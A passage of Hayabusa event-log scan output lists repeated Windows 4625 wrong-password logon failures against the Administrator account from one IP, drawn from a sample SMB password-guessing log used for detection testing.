01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 